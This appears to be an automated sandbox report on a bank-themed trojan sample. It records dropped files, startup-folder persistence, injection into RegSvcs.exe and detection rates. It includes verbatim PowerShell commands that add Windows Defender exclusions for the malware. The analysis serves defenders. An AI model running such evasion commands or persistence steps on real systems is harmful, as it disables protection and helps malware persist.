Source: 7zFM.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Acrobat.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcrobatInfo.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: acrobat_sl.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroBroker.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe0.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_pwa_launcher.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_click_helper.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe0.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe0.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: classification engine Classification label: mal100.spre.troj.expl.evad.winEXE@38/165@55/19
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0046A06A GetLastError,FormatMessageW, 0_2_0046A06A
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle, 0_2_004581CB
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_004587E1
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_0046B333
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_0047EE0D
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize, 0_2_0046C397
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00404E89
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AFCBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW, 0_2_00AFCBD0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File created: C:\Users\user\AppData\Roaming\a8259331cca430bb.bin
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Users\user\AppData\Roaming\XClient.exe Mutant created: NULL
Source: C:\Windows\System32\alg.exe Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-a8259331cca430bb9ea72c54-b
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-a8259331cca430bb-inf
Source: C:\Users\user\AppData\Local\differences\niellist.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-a8259331cca430bb7d8e3ee9-b
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Mutant created: \Sessions\1\BaseNamedObjects\XoFHv1TT4hWErxRo
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File created: C:\Users\user\AppData\Local\Temp\aut9353.tmp
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\niellist.vbs"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe Virustotal: Detection: 79%
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe ReversingLabs: Detection: 86%
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File read: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe
Source: unknown Process created: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe"
Source: unknown Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: unknown Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Process created: C:\Users\user\AppData\Local\differences\niellist.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe"
Source: C:\Users\user\AppData\Local\differences\niellist.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: unknown Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\niellist.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\differences\niellist.exe "C:\Users\user\AppData\Local\differences\niellist.exe"
Source: C:\Users\user\AppData\Local\differences\niellist.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\differences\niellist.exe"
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
Source: unknown Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: unknown Process created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
Source: unknown Process created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
Source: unknown Process created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
Source: unknown Process created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
Source: unknown Process created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\alg.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\alg.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\alg.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\alg.exe Section loaded: mpr.dll
Source: C:\Windows\System32\alg.exe Section loaded: secur32.dll
Source: C:\Windows\System32\alg.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\alg.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\alg.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\alg.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\alg.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\alg.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\alg.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\alg.exe Section loaded: webio.dll
Source: C:\Windows\System32\alg.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\alg.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\alg.exe Section loaded: drprov.dll
Source: C:\Windows\System32\alg.exe Section loaded: winsta.dll
Source: C:\Windows\System32\alg.exe Section loaded: ntlanman.dll
Source: C:\Windows\System32\alg.exe Section loaded: davclnt.dll
Source: C:\Windows\System32\alg.exe Section loaded: davhlpr.dll
Source: C:\Windows\System32\alg.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\alg.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\alg.exe Section loaded: netutils.dll
Source: C:\Windows\System32\alg.exe Section loaded: browcli.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: mpr.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: secur32.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: mpr.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: secur32.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: ntmarta.dll
